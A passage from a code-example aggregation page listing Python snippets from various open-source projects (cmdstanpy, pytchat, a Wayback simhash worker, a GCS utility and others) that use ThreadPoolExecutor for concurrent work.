            "6": b'\x36',
            "7": b'\x37',
            "8": b'\x38',
            "9": b'\x39'
        }

        try:
            """ generate activation packet containing the alarm code, to trigger the right sensor packets """
            packet_code = b''
            for c in hass.data[DOMAIN]['code']:
                packet_code = packet_code + switcher.get(c)
            self._activation_packet = b'\x80\x08\x03\x39\x39\x39' + packet_code

            hass.bus.async_listen('homeassistant_stop', self.shutdown_threads)

            self._io_pool_exc = ThreadPoolExecutor(max_workers=5)
            self._read_loop_future = self._io_pool_exc.submit(self._read_loop)
            self._watcher_loop_keepalive_future = self._io_pool_exc.submit(
                self._watcher_loop_keepalive)
            self._watcher_loop_triggersensorupdate_future = self._io_pool_exc.submit(
                self._watcher_loop_triggersensorupdate)

        except Exception as ex:
            _LOGGER.error('Unexpected error 1: %s', format(ex))

Example #52

0

Show file

File: bucket_util.py Project: riahtu/professional-services

    def get_existing_paths(self):
        """Discovers existing paths in a bucket.

        Faster alternative to using native google.cloud.storage.bucket.Bucket's
        list_blobs() method. Generates all combinations of files using
        FILE_PARAMETERS, and checks if the first file in that combination
        exists. If so, it is added to existing_paths set. Creating a set of the
        first files for each combinations rather than generating a list
        of all 1, 100, 1000, or 10000 files per combination
        (depending on the number of files in the combination)
        saves time and space.

        Returns:
            existing_paths: set containing paths that already exist in given
            bucket
        """
        def _path_exists(path_details):
            """Adds a path to the path_set if it exists.

            Constructs a path based off of the parameters in the path_details
            tuple. Checks that the constructed path exists in the bucket
            defined in the outer function. If so, the path is added to path_set.

            Args:
                path_details (tuple):  of
                    (file_type,
                    num_column,
                    column_type,
                    num_file,
                    table_size)
            """
            file_type, \
                num_column, \
                column_type, \
                num_file, \
                table_size = path_details
            for compression_type in compression_types[file_type]:
                if compression_type == 'none':
                    extension = file_type
                else:
                    extension = compression_extensions[compression_type]

                path = path_string.format(
                    file_type,
                    compression_type,
                    num_column,
                    column_type,
                    num_file,
                    table_size,
                    extension,
                )
                exists = storage.Blob(
                    bucket=bucket,
                    name=path,
                ).exists(gcs_client)

                if exists:
                    path_set.add(path)

        logging.info('Discovering files from parameters list that exist'
                     ' in bucket {0:s}.'.format(self.bucket_name))
        file_types = self.file_params['fileType']
        compression_types = self.file_params['fileCompressionTypes']
        num_columns = self.file_params['numColumns']
        column_types = self.file_params['columnTypes']
        num_files = self.file_params['numFiles']
        table_sizes = self.file_params['stagingDataSizes']
        compression_extensions = (
            file_constants.FILE_CONSTANTS['compressionExtensions'])
        path_set = set()
        path_string = ('fileType={0:s}/compression={1:s}/numColumns={2:d}/'
                       'columnTypes={3:s}/numFiles={4:d}/tableSize={5:s}/'
                       'file1.{6:s}')

        gcs_client = storage.Client(project=self.project_id)
        bucket = gcs_client.get_bucket(self.bucket_name)

        with ThreadPoolExecutor() as p:
            p.map(
                _path_exists,
                itertools.product(
                    file_types,
                    num_columns,
                    column_types,
                    num_files,
                    table_sizes,
                ))

        logging.info('Done discovering {0:d} existing files.'.format(
            len(path_set)))
        return path_set

Example #53

0

Show file

File: model.py Project: wesbarnett/cmdstanpy

    def generate_quantities(
        self,
        data: Union[Dict, str] = None,
        mcmc_sample: Union[CmdStanMCMC, List[str]] = None,
        seed: int = None,
        gq_output_dir: str = None,
    ) -> CmdStanGQ:
        """
        Run CmdStan's generate_quantities method which runs the generated
        quantities block of a model given an existing sample.

        This function takes a CmdStanMCMC object and the dataset used to
        generate that sample and calls to the CmdStan ``generate_quantities``
        method to generate additional quantities of interest.

        The ``CmdStanGQ`` object records the command, the return code,
        and the paths to the generate method output csv and console files.
        The output files are written either to a specified output directory
        or to a temporary directory which is deleted upon session exit.

        Output filenames are composed of the model name, a timestamp
        in the form YYYYMMDDhhmm and the chain id, plus the corresponding
        filetype suffix, either '.csv' for the CmdStan output or '.txt' for
        the console messages, e.g. `bernoulli_ppc-201912081451-1.csv`. Output
        files  written to the temporary directory contain an additional
        8-character random string, e.g.
        `bernoulli_ppc-201912081451-1-5nm6as7u.csv`.

        :param data: Values for all data variables in the model, specified
            either as a dictionary with entries matching the data variables,
            or as the path of a data file in JSON or Rdump format.

        :param mcmc_sample: Can be either a CmdStanMCMC object returned by
            CmdStanPy's `sample` method or a list of stan-csv files generated
            by fitting the model to the data using any Stan interface.

        :param seed: The seed for random number generator. Must be an integer
            between ``0`` and ``2^32 - 1``. If unspecified,
            ``numpy.random.RandomState()``
            is used to generate a seed which will be used for all chains.
            *NOTE: Specifying the seed will guarantee the same result for
            multiple invocations of this method with the same inputs.  However
            this will not reproduce results from the sample method given
            the same inputs because the RNG will be in a different state.*

        :param gq_output_dir:  Name of the directory in which the CmdStan output
            files are saved.  If unspecified, files will be written to a
            temporary directory which is deleted upon session exit.

        :return: CmdStanGQ object
        """
        sample_csv_files = []
        sample_drawset = None
        chains = 0

        if isinstance(mcmc_sample, CmdStanMCMC):
            sample_csv_files = mcmc_sample.runset.csv_files
            sample_drawset = mcmc_sample.get_drawset()
            chains = mcmc_sample.chains
        elif isinstance(mcmc_sample, list):
            sample_csv_files = mcmc_sample
        else:
            raise ValueError(
                'mcmc_sample must be either CmdStanMCMC object'
                ' or list of paths to sample csv_files'
            )

        try:
            chains = len(sample_csv_files)
            if sample_drawset is None:  # assemble sample from csv files
                sampler_args = SamplerArgs()
                args = CmdStanArgs(
                    self._name,
                    self._exe_file,
                    chain_ids=[x + 1 for x in range(chains)],
                    method_args=sampler_args,
                )
                runset = RunSet(args=args, chains=chains)
                runset._csv_files = sample_csv_files
                sample_fit = CmdStanMCMC(runset)
                sample_fit._validate_csv_files()
                sample_drawset = sample_fit.get_drawset()
        except ValueError as e:
            raise ValueError(
                'Invalid mcmc_sample, error:\n\t{}\n\t'
                ' while processing files\n\t{}'.format(
                    repr(e), '\n\t'.join(sample_csv_files)
                )
            )

        generate_quantities_args = GenerateQuantitiesArgs(
            csv_files=sample_csv_files
        )
        generate_quantities_args.validate(chains)
        with MaybeDictToFilePath(data, None) as (_data, _inits):
            args = CmdStanArgs(
                self._name,
                self._exe_file,
                chain_ids=[x + 1 for x in range(chains)],
                data=_data,
                seed=seed,
                output_dir=gq_output_dir,
                method_args=generate_quantities_args,
            )
            runset = RunSet(args=args, chains=chains)

            cores_avail = cpu_count()
            cores = max(min(cores_avail - 2, chains), 1)
            with ThreadPoolExecutor(max_workers=cores) as executor:
                for i in range(chains):
                    executor.submit(self._run_cmdstan, runset, i)

            if not runset._check_retcodes():
                msg = 'Error during generate_quantities'
                for i in range(chains):
                    if runset._retcode(i) != 0:
                        msg = '{}, chain {} returned error code {}'.format(
                            msg, i, runset._retcode(i)
                        )
                raise RuntimeError(msg)
            quantities = CmdStanGQ(runset=runset, mcmc_sample=sample_drawset)
            quantities._set_attrs_gq_csv_files(sample_csv_files[0])
        return quantities

Example #54

0

Show file

File: ScrapeAmazon.py Project: dipta007/amazon-scrapper-1M

    "beauty",
    "hair",
    "apple",
    "macbook",
    "calcukator",
    "pen",
    "glass",
    "note 8",
    "samsung",
    "wallet",
    "watch"
]
products = []
threads = []
THREADING_LIMIT = 444
executor = ThreadPoolExecutor(max_workers=THREADING_LIMIT)
started_threads = queue.Queue(maxsize=1000000)
not_started_threads = queue.Queue(maxsize=1000000)
elastic_search = None


class ScrapingThread(threading.Thread):
    def __init__(self, asin, search_txt, type, url, strt, endd):
        threading.Thread.__init__(self)
        self.asin = asin
        self.search_text = search_txt
        self.type = type
        self.starting = strt
        self.ending = endd
        self.url = url

Example #55

0

Show file

File: seg-acc-test.py Project: sardesaim/OAK-D-depthai-expts

import ntpath
import time
import os
from tensorflow.keras import backend as K
import argparse
from pathlib import Path
from multiprocessing import Process
from time import time
try:
    from armv7l.openvino.inference_engine import IENetwork, IECore
except:
    from openvino.inference_engine import IENetwork, IECore

from skimage.transform import resize
from concurrent.futures import ThreadPoolExecutor
executor = ThreadPoolExecutor(max_workers=16)

parser = argparse.ArgumentParser()
parser.add_argument('-ip', '--input_path', \
    default='D:/00_NCSU/00_Resources/00_Datasets/oak_NC_MD_grassclover/val/', \
    type=str, help="Input Path")
parser.add_argument("--xml_path",\
                    default="/home/pi/OAK-D-depthai-expts/02-NCS2-mode/FP16/3class_360/3class_360.xml", \
                        help="Path of the deeplabv3plus openvino model.")
parser.add_argument('-pb_path', '--tf_pb_path', \
    default = "D:/00_NCSU/Fall2020/ECE633_IndividualTopics/OAK-D-Weed-Cam/Model/deeplabv3+/models/3_class_model_mobilenet_v3_small_v2.1/3_class_model_mobilenet_v3_small_v2.1_1080x1920.pb", \
        type=str, help='Model Path for tensorflow file')
parser.add_argument('-ms',
                    '--model_size',
                    default=(1080, 1920),
                    type=int,

Example #56

0

Show file

File: model.py Project: wesbarnett/cmdstanpy

    def sample(
        self,
        data: Union[Dict, str] = None,
        chains: Union[int, None] = None,
        cores: Union[int, None] = None,
        seed: Union[int, List[int]] = None,
        chain_ids: Union[int, List[int]] = None,
        inits: Union[Dict, float, str, List[str]] = None,
        warmup_iters: int = None,
        sampling_iters: int = None,
        save_warmup: bool = False,
        thin: int = None,
        max_treedepth: float = None,
        metric: Union[str, List[str]] = None,
        step_size: Union[float, List[float]] = None,
        adapt_engaged: bool = True,
        adapt_delta: float = None,
        fixed_param: bool = False,
        output_dir: str = None,
        save_diagnostics: bool = False,
        show_progress: Union[bool, str] = False
    ) -> CmdStanMCMC:
        """
        Run or more chains of the NUTS sampler to produce a set of draws
        from the posterior distribution of a model conditioned on some data.

        This function validates the specified configuration, composes a call to
        the CmdStan ``sample`` method and spawns one subprocess per chain to run
        the sampler and waits for all chains to run to completion.
        Unspecified arguments are not included in the call to CmdStan, i.e.,
        those arguments will have CmdStan default values.

        For each chain, the ``CmdStanMCMC`` object records the command,
        the return code, the sampler output file paths, and the corresponding
        console outputs, if any. The output files are written either to a
        specified output directory or to a temporary directory which is deleted
        upon session exit.

        The output filenames are composed of the model name, a timestamp
        in the form YYYYMMDDhhmm and the chain id, plus the corresponding
        filetype suffix, either '.csv' for the CmdStan output or '.txt' for
        the console messages, e.g. `bernoulli-201912081451-1.csv`. Output files
        written to the temporary directory contain an additional 8-character
        random string, e.g. `bernoulli-201912081451-1-5nm6as7u.csv`.


        :param data: Values for all data variables in the model, specified
            either as a dictionary with entries matching the data variables,
            or as the path of a data file in JSON or Rdump format.

        :param chains: Number of sampler chains, should be > 1.

        :param cores: Number of processes to run in parallel. Must be an
            integer between 1 and the number of CPUs in the system.
            If none then set automatically to `chains` but no more
            than `total_cpu_count - 2`

        :param seed: The seed for random number generator. Must be an integer
            between ``0`` and ``2^32 - 1``. If unspecified,
            ``numpy.random.RandomState()``
            is used to generate a seed which will be used for all chains.
            When the same seed is used across all chains,
            the chain-id is used to advance the RNG to avoid dependent samples.

        :param chain_ids: The offset for the random number generator, either
            an integer or a list of unique per-chain offsets.  If unspecified,
            chain ids are numbered sequentially starting from 1.

        :param inits: Specifies how the sampler initializes parameter values.
            Initialization is either uniform random on a range centered on 0,
            exactly 0, or a dictionary or file of initial values for some or all
            parameters in the model.  The default initialization behavior will
            initialize all parameter values on range [-2, 2] on the
            _unconstrained_ support.  If the expected parameter values are
            too far from this range, this option may improve adaptation.
            The following value types are allowed:

            * Single number ``n > 0`` - initialization range is [-n, n].
            * ``0`` - all parameters are initialized to 0.
            * dictionary - pairs parameter name : initial value.
            * string - pathname to a JSON or Rdump data file.
            * list of strings - per-chain pathname to data file.

        :param warmup_iters: Number of warmup iterations for each chain.

        :param sampling_iters: Number of draws from the posterior for each
            chain.

        :param save_warmup: When True, sampler saves warmup draws as part of
            the Stan csv output file.

        :param thin: Period between saved samples.

        :param max_treedepth: Maximum depth of trees evaluated by NUTS sampler
            per iteration.

        :param metric: Specification of the mass matrix, either as a
            vector consisting of the diagonal elements of the covariance
            matrix (``diag`` or ``diag_e``) or the full covariance matrix
            (``dense`` or ``dense_e``).

            If the value of the metric argument is a string other than
            ``diag``, ``diag_e``, ``dense``, or ``dense_e``, it must be
            a valid filepath to a JSON or Rdump file which contains an entry
            ``inv_metric`` whose value is either the diagonal vector or
            the full covariance matrix.

            If the value of the metric argument is a list of paths, its
            length must match the number of chains and all paths must be
            unique.

        :param step_size: Initial stepsize for HMC sampler.  The value is either
            a single number or a list of numbers which will be used as the
            global or per-chain initial step_size, respectively.
            The length of the list of step sizes must match the number of
            chains.

        :param adapt_engaged: When True, adapt stepsize and metric.
            *Note: If True, ``warmup_iters`` must be > 0.*

        :param adapt_delta: Adaptation target Metropolis acceptance rate.
            The default value is 0.8.  Increasing this value, which must be
            strictly less than 1, causes adaptation to use smaller step sizes.
            It improves the effective sample size, but may increase the time
            per iteration.

        :param fixed_param: When True, call CmdStan with argument
            "algorithm=fixed_param" which runs the sampler without
            updating the Markov Chain, thus the values of all parameters and
            transformed parameters are constant across all draws and
            only those values in the generated quantities block that are
            produced by RNG functions may change.  This provides
            a way to use Stan programs to generate simulated data via the
            generated quantities block.  This option must be used when the
            parameters block is empty.  Default value is False.

        :param output_dir: Name of the directory to with the  CmdStan output
            files are written. If unspecified, output files will be written
            to a temporary directory which is deleted upon session exit.

        :param save_diagnostics: Whether or not to save diagnostics. If True,
            csv output files are written to
            ``<basename>-diagnostic-<chain_id>.csv.``, where ``<basename>``
            is set with ``csv_basename``.

        :param show_progress: Use tqdm progress bar to show sampling progress.
            If show_progress=='notebook' use tqdm_notebook
            (needs nodejs for jupyter).

        :return: CmdStanMCMC object
        """

        if chains is None:
            if fixed_param:
                chains = 1
            else:
                chains = 4
        if chains < 1:
            raise ValueError(
                'chains must be a positive integer value, found {}'.format(
                    chains
                )
            )

        if chain_ids is None:
            chain_ids = [x + 1 for x in range(chains)]
        else:
            if isinstance(chain_ids, int):
                if chain_ids < 1:
                    raise ValueError(
                        'chain_id must be a positive integer value,'
                        ' found {}'.format(chain_ids)
                    )
                offset = chain_ids
                chain_ids = [x + offset + 1 for x in range(chains)]
            else:
                if not len(chain_ids) == chains:
                    raise ValueError(
                        'chain_ids must correspond to number of chains'
                        ' specified {} chains, found {} chain_ids'.format(
                            chains, len(chain_ids)
                        )
                    )
                for i in len(chain_ids):
                    if chain_ids[i] < 1:
                        raise ValueError(
                            'chain_id must be a positive integer value,'
                            ' found {}'.format(chain_ids[i])
                        )

        cores_avail = cpu_count()
        if cores is None:
            cores = max(min(cores_avail - 2, chains), 1)
        if cores < 1:
            raise ValueError(
                'cores must be a positive integer value, found {}'.format(cores)
            )
        if cores > cores_avail:
            self._logger.warning(
                'requested %u cores, only %u available', cores, cpu_count()
            )
            cores = cores_avail

        refresh = None
        if show_progress:
            try:
                import tqdm

                self._logger.propagate = False
            except ImportError:
                self._logger.warning(
                    (
                        'tqdm not installed, progress information is not '
                        'shown. Please install tqdm with '
                        "'pip install tqdm'"
                    )
                )
                show_progress = False

        # TODO:  issue 49: inits can be initialization function

        sampler_args = SamplerArgs(
            warmup_iters=warmup_iters,
            sampling_iters=sampling_iters,
            save_warmup=save_warmup,
            thin=thin,
            max_treedepth=max_treedepth,
            metric=metric,
            step_size=step_size,
            adapt_engaged=adapt_engaged,
            adapt_delta=adapt_delta,
            fixed_param=fixed_param,
        )
        with MaybeDictToFilePath(data, inits) as (_data, _inits):
            args = CmdStanArgs(
                self._name,
                self._exe_file,
                chain_ids=chain_ids,
                data=_data,
                seed=seed,
                inits=_inits,
                output_dir=output_dir,
                save_diagnostics=save_diagnostics,
                method_args=sampler_args,
                refresh=refresh,
            )
            runset = RunSet(args=args, chains=chains)
            pbar = None
            all_pbars = []

            with ThreadPoolExecutor(max_workers=cores) as executor:
                for i in range(chains):
                    if show_progress:
                        if (
                            isinstance(show_progress, str)
                            and show_progress.lower() == 'notebook'
                        ):
                            try:
                                tqdm_pbar = tqdm.tqdm_notebook
                            except ImportError:
                                msg = (
                                    'Cannot import tqdm.tqdm_notebook.\n'
                                    'Functionality is only supported on the '
                                    'Jupyter Notebook and compatible platforms'
                                    '.\nPlease follow the instructions in '
                                    'https://github.com/tqdm/tqdm/issues/394#'
                                    'issuecomment-384743637 and remember to '
                                    'stop & start your jupyter server.'
                                )
                                self._logger.warning(msg)
                                tqdm_pbar = tqdm.tqdm
                        else:
                            tqdm_pbar = tqdm.tqdm

                        # enable dynamic_ncols for advanced users
                        # currently hidden feature
                        dynamic_ncols = os.environ.get(
                            'TQDM_DYNAMIC_NCOLS', 'False'
                        )
                        if dynamic_ncols.lower() in ['0', 'false']:
                            dynamic_ncols = False
                        else:
                            dynamic_ncols = True

                        pbar = tqdm_pbar(
                                desc='Chain {} - warmup'.format(i + 1),
                                position=i,
                                total=1,  # Will set total from Stan's output
                                dynamic_ncols=dynamic_ncols,
                            )

                        all_pbars.append(pbar)

                    executor.submit(self._run_cmdstan, runset, i, pbar)

            # Closing all progress bars
            for pbar in all_pbars:
                pbar.close()

            if show_progress:
                # re-enable logger for console
                self._logger.propagate = True
            if not runset._check_retcodes():
                msg = 'Error during sampling'
                for i in range(chains):
                    if runset._retcode(i) != 0:
                        msg = '{}, chain {} returned error code {}'.format(
                            msg, i, runset._retcode(i)
                        )
                raise RuntimeError(msg)
            mcmc = CmdStanMCMC(runset, fixed_param)
            mcmc._validate_csv_files()
        return mcmc

Example #57

0

Show file

def filter_failures(failureThreshold, folder, threads):
    executor = ThreadPoolExecutor(max_workers=threads)
    for root, _dirs, mutations in os.walk(folder):
        for mutation in mutations:
            executor.submit(filter, root, mutation, failureThreshold)
    executor.shutdown(wait=True)

Example #58

0

Show file

class Discover(Task):
    """Custom Celery Task class.
    http://docs.celeryproject.org/en/latest/userguide/tasks.html#custom-task-classes
    """
    name = 'Discover'
    task_id = None
    # If a simhash calculation for a URL & year does more than
    # `max_download_errors`, stop it to avoid pointless requests. The captures
    # are not text/html or there is a problem with the WBM.
    max_download_errors = 10
    max_capture_download = 1000000

    def __init__(self, cfg):
        self.simhash_size = cfg['simhash']['size']
        self.simhash_expire = cfg['simhash']['expire_after']
        if self.simhash_size > 512:
            raise Exception('do not support simhash longer than 512')

        headers = {
            'User-Agent': 'wayback-discover-diff',
            'Accept-Encoding': 'gzip,deflate',
            'Connection': 'keep-alive'
        }
        cdx_auth_token = cfg.get('cdx_auth_token')
        if cdx_auth_token:
            headers['cookie'] = 'cdx_auth_token=%s' % cdx_auth_token

        self.http = urllib3.HTTPConnectionPool('web.archive.org',
                                               maxsize=50,
                                               retries=4,
                                               headers=headers)
        self.redis = StrictRedis(connection_pool=BlockingConnectionPool.
                                 from_url(cfg['redis_uri'],
                                          max_connections=50,
                                          timeout=cfg.get('redis_timeout', 10),
                                          decode_responses=True))
        self.tpool = ThreadPoolExecutor(max_workers=cfg['threads'])
        self.snapshots_number = cfg['snapshots']['number_per_year']
        self.download_errors = 0
        # Initialize logger
        self._log = logging.getLogger('wayback_discover_diff.worker')

    def download_capture(self, ts):
        """Download capture data from the WBM and update job status. Return
        data only when its text or html. On download error, increment download_errors
        which will stop the task after 10 errors. Fetch data up to a limit
        to avoid getting too much (which is unnecessary) and have a consistent
        operation time.
        """
        try:
            statsd_incr('download-capture')
            self._log.info('fetching capture %s %s', ts, self.url)
            res = self.http.request('GET',
                                    '/web/%sid_/%s' % (ts, self.url),
                                    preload_content=False)
            data = res.read(self.max_capture_download)
            ctype = res.headers.get('content-type')
            res.release_conn()
            if ctype:
                ctype = ctype.lower()
                if "text" in ctype or "html" in ctype:
                    return data
        except HTTPError as exc:
            self.download_errors += 1
            self._log.error('cannot fetch capture %s %s',
                            ts,
                            self.url,
                            exc_info=1)
        return None

    def start_profiling(self, snapshot, index):
        """Used for performance testing only.
        """
        cProfile.runctx('self.get_calc(snapshot, index)',
                        globals=globals(),
                        locals=locals(),
                        filename='profile.prof')

    def get_calc(self, capture):
        """if a capture with an equal digest has been already processed,
        return cached simhash and avoid redownloading and processing. Else,
        download capture, extract HTML features and calculate simhash.
        If there are already too many download failures, return None without
        any processing to avoid pointless requests.
        Return None if any problem occurs (e.g. HTTP error or cannot calculate)
        """
        (timestamp, digest) = capture.split(' ')
        simhash_enc = self.seen.get(digest)
        if simhash_enc:
            self._log.info("already seen %s", digest)
            return (timestamp, simhash_enc)

        if self.download_errors >= self.max_download_errors:
            self._log.error(
                '%d consecutive download errors fetching %s captures',
                self.download_errors, self.url)
            return None

        response_data = self.download_capture(timestamp)
        if response_data:
            data = extract_html_features(response_data)
            if data:
                statsd_incr('calculate-simhash')
                self._log.info("calculating simhash")
                simhash = calculate_simhash(data,
                                            self.simhash_size,
                                            hashfunc=custom_hash_function)
                # This encoding is necessary to store simhash data in Redis.
                simhash_enc = base64.b64encode(
                    pack_simhash_to_bytes(simhash, self.simhash_size))
                self.seen[digest] = simhash_enc
                return (timestamp, simhash_enc)
        return None

    def run(self, url, year, created):
        """Run Celery Task.
        """
        self.job_id = self.request.id
        self.url = url_fix(url)
        time_started = datetime.now()
        self._log.info('Start calculating simhashes.')
        self.download_errors = 0
        if not self.url:
            self._log.error('did not give url parameter')
            return {'status': 'error', 'info': 'URL is required.'}
        if not year:
            self._log.error('did not give year parameter')
            return {'status': 'error', 'info': 'Year is required.'}
        # fetch captures
        self.update_state(
            state='PENDING',
            meta={'info': 'Fetching %s captures for year %s' % (url, year)})
        resp = self.fetch_cdx(url, year)
        if resp.get('status') == 'error':
            return resp
        captures = resp.get('captures')
        total = len(captures)
        self.seen = dict()
        # calculate simhashes in parallel
        i = 0
        final_results = {}
        for res in self.tpool.map(self.get_calc, captures):
            if not res:
                continue
            (timestamp, simhash) = res
            if simhash:
                final_results[timestamp] = simhash
            if i % 10 == 0:
                self.update_state(state='PENDING',
                                  meta={
                                      'info':
                                      'Processed %d out of %d captures.' %
                                      (i, total)
                                  })
            i += 1

        self._log.info('%d final results for %s and year %s.',
                       len(final_results), self.url, year)
        if final_results:
            try:
                urlkey = surt(self.url)
                self.redis.hmset(urlkey, final_results)
                self.redis.expire(urlkey, self.simhash_expire)
            except RedisError as exc:
                self._log.error('cannot write simhashes to Redis for URL %s',
                                self.url,
                                exc_info=1)

        duration = (datetime.now() - time_started).seconds
        self._log.info('Simhash calculation finished in %.2fsec.', duration)
        return {'duration': str(duration)}

    def fetch_cdx(self, url, year):
        """Make a CDX query for timestamp and digest for a specific year.
        """
        try:
            self._log.info('fetching CDX of %s for year %s', url, year)
            # Collapse captures by timestamp to get 3 captures per day (max).
            # TODO increase that in the future when we can handle more captures.
            # Its necessary to reduce the huge number of captures some websites
            # (e.g. twitter.com has 167k captures for 2018. Get only 2xx captures.
            fields = {
                'url': url,
                'from': year,
                'to': year,
                'statuscode': 200,
                'fl': 'timestamp,digest',
                'collapse': 'timestamp:9'
            }
            if self.snapshots_number != -1:
                fields['limit'] = self.snapshots_number
            response = self.http.request('GET', '/web/timemap', fields=fields)
            self._log.info('finished fetching timestamps of %s for year %s',
                           self, year)
            if response.status == 200:
                if not response.data:
                    self._log.info('no captures found for %s %s', self, year)
                    urlkey = surt(url)
                    self.redis.hset(urlkey, year, -1)
                    self.redis.expire(urlkey, self.simhash_expire)
                    return {
                        'status': 'error',
                        'info': 'No captures of %s for year %s' % (url, year)
                    }
                captures_txt = response.data.decode('utf-8')
                captures = captures_txt.strip().split("\n")
                if captures:
                    return {'status': 'success', 'captures': captures}
                return {
                    'status': 'error',
                    'info': 'No captures of %s for year %s' % (url, year)
                }
        except (ValueError, HTTPError) as exc:
            self._log.error('invalid CDX query response for %s %s',
                            url,
                            year,
                            exc_info=1)
            return {'status': 'error', 'info': str(exc)}
        except RedisError as exc:
            self._log.error('error connecting with Redis for url %s year %s',
                            url,
                            year,
                            exc_info=1)
            return {'status': 'error', 'info': str(exc)}

Example #59

0

Show file

File: main.py Project: donkeyofking/sd5gsim

def run_io_tasks_in_parallel(tasks):
    with ThreadPoolExecutor() as executor:
        running_tasks = [executor.submit(task) for task in tasks]
        for running_task in running_tasks:
            running_task.result()

Example #60

0

Show file

File: livechat.py Project: wakamezake/pytchat

class LiveChat:
    '''
    LiveChat object fetches chat data and stores them
    in a buffer with ThreadpoolExecutor.

    Parameter
    ---------
    video_id : str

    seektime : int
        start position of fetching chat (seconds).
        This option is valid for archived chat only.
        If negative value, chat data posted before the start of the broadcast
        will be retrieved as well.

    processor : ChatProcessor

    buffer : Buffer
        buffer of chat data fetched background.

    interruptable : bool
        Allows keyboard interrupts.
        Set this parameter to False if your own threading program causes
        the problem.

    callback : func
        function called periodically from _listen().

    done_callback : func
        function called when listener ends.

    direct_mode : bool
        If True, invoke specified callback function without using buffer.
        callback is required. If not, IllegalFunctionCall will be raised.

    force_replay : bool
        force to fetch archived chat data, even if specified video is live.

    topchat_only : bool
        If True, get only top chat.

    Attributes
    ---------
    _executor : ThreadPoolExecutor
        This is used for _listen() loop.

    _is_alive : bool
        Flag to stop getting chat.
    '''

    _setup_finished = False

    def __init__(self,
                 video_id,
                 seektime=-1,
                 processor=DefaultProcessor(),
                 buffer=None,
                 interruptable=True,
                 callback=None,
                 done_callback=None,
                 direct_mode=False,
                 force_replay=False,
                 topchat_only=False,
                 logger=config.logger(__name__)):
        self._video_id = extract_video_id(video_id)
        self.seektime = seektime
        if isinstance(processor, tuple):
            self.processor = Combinator(processor)
        else:
            self.processor = processor
        self._buffer = buffer
        self._callback = callback
        self._done_callback = done_callback
        self._executor = ThreadPoolExecutor(max_workers=2)
        self._direct_mode = direct_mode
        self._is_alive = True
        self._is_replay = force_replay
        self._parser = Parser(is_replay=self._is_replay)
        self._pauser = Queue()
        self._pauser.put_nowait(None)
        self._first_fetch = True
        self._fetch_url = "live_chat/get_live_chat?continuation="
        self._topchat_only = topchat_only
        self._event = Event()
        self._logger = logger
        self.exception = None
        if interruptable:
            signal.signal(signal.SIGINT, lambda a, b: self.terminate())
        self._setup()

    def _setup(self):
        # An exception is raised when direct mode is true and no callback is set.
        if self._direct_mode:
            if self._callback is None:
                raise exceptions.IllegalFunctionCall(
                    "When direct_mode=True, callback parameter is required.")
        else:
            # Create a default buffer if `direct_mode` is False and buffer is not set.
            if self._buffer is None:
                self._buffer = Buffer(maxsize=20)
                # Create a loop task to call callback if the `callback` param is specified.
            if self._callback is None:
                pass
            else:
                # Start a loop task calling callback function.
                self._executor.submit(self._callback_loop, self._callback)
        # Start a loop task for _listen()
        self.listen_task = self._executor.submit(self._startlisten)
        # Register add_done_callback
        if self._done_callback is None:
            self.listen_task.add_done_callback(self._finish)
        else:
            self.listen_task.add_done_callback(self._done_callback)

    def _startlisten(self):
        time.sleep(0.1)  # sleep shortly to prohibit skipping fetching data
        """Fetch first continuation parameter,
        create and start _listen loop.
        """
        initial_continuation = liveparam.getparam(self._video_id, 3)
        self._listen(initial_continuation)

    def _listen(self, continuation):
        ''' Fetch chat data and store them into buffer,
        get next continuaiton parameter and loop.

        Parameter
        ---------
        continuation : str
            parameter for next chat data
        '''
        try:
            with httpx.Client(http2=True) as client:
                while (continuation and self._is_alive):
                    continuation = self._check_pause(continuation)
                    contents = self._get_contents(continuation, client,
                                                  headers)
                    metadata, chatdata = self._parser.parse(contents)
                    timeout = metadata['timeoutMs'] / 1000
                    chat_component = {
                        "video_id": self._video_id,
                        "timeout": timeout,
                        "chatdata": chatdata
                    }
                    time_mark = time.time()
                    if self._direct_mode:
                        processed_chat = self.processor.process(
                            [chat_component])
                        if isinstance(processed_chat, tuple):
                            self._callback(*processed_chat)
                        else:
                            self._callback(processed_chat)
                    else:
                        self._buffer.put(chat_component)
                    diff_time = timeout - (time.time() - time_mark)
                    self._event.wait(diff_time if diff_time > 0 else 0)
                    continuation = metadata.get('continuation')
        except exceptions.ChatParseException as e:
            self._logger.debug(f"[{self._video_id}]{str(e)}")
            raise
        except (TypeError, json.JSONDecodeError):
            self._logger.error(f"{traceback.format_exc(limit=-1)}")
            raise

        self._logger.debug(f"[{self._video_id}] finished fetching chat.")
        raise exceptions.ChatDataFinished

    def _check_pause(self, continuation):
        if self._pauser.empty():
            '''pause'''
            self._pauser.get()
            '''resume:
                prohibit from blocking by putting None into _pauser.
            '''
            self._pauser.put_nowait(None)
            if not self._is_replay:
                continuation = liveparam.getparam(self._video_id, 3)
        return continuation

    def _get_contents(self, continuation, client, headers):
        '''Get 'continuationContents' from livechat json.
           If contents is None at first fetching,
           try to fetch archive chat data.

          Return:
          -------
            'continuationContents' which includes metadata & chat data.
        '''
        livechat_json = (self._get_livechat_json(continuation, client,
                                                 headers))
        contents = self._parser.get_contents(livechat_json)
        if self._first_fetch:
            if contents is None or self._is_replay:
                '''Try to fetch archive chat data.'''
                self._parser.is_replay = True
                self._fetch_url = "live_chat_replay/get_live_chat_replay?continuation="
                continuation = arcparam.getparam(self._video_id, self.seektime,
                                                 self._topchat_only)
                livechat_json = (self._get_livechat_json(
                    continuation, client, headers))
                reload_continuation = self._parser.reload_continuation(
                    self._parser.get_contents(livechat_json))
                if reload_continuation:
                    livechat_json = (self._get_livechat_json(
                        reload_continuation, client, headers))
                contents = self._parser.get_contents(livechat_json)
                self._is_replay = True
            self._first_fetch = False
        return contents

    def _get_livechat_json(self, continuation, client, headers):
        '''
        Get json which includes chat data.
        '''
        continuation = urllib.parse.quote(continuation)
        livechat_json = None
        url = f"https://www.youtube.com/{self._fetch_url}{continuation}&pbj=1"
        for _ in range(MAX_RETRY + 1):
            with client:
                try:
                    livechat_json = client.get(url, headers=headers).json()
                    break
                except (json.JSONDecodeError, httpx.HTTPError):
                    time.sleep(2)
                    continue
        else:
            self._logger.error(f"[{self._video_id}]" f"Exceeded retry count.")
            raise exceptions.RetryExceedMaxCount()
        return livechat_json

    def _callback_loop(self, callback):
        """ If a callback is specified in the constructor,
        it throws chat data at regular intervals to the
        function specified in the callback in the backgroun

        Parameter
        ---------
        callback : func
            function to which the processed chat data is passed.
        """
        while self.is_alive():
            items = self._buffer.get()
            processed_chat = self.processor.process(items)
            if isinstance(processed_chat, tuple):
                self._callback(*processed_chat)
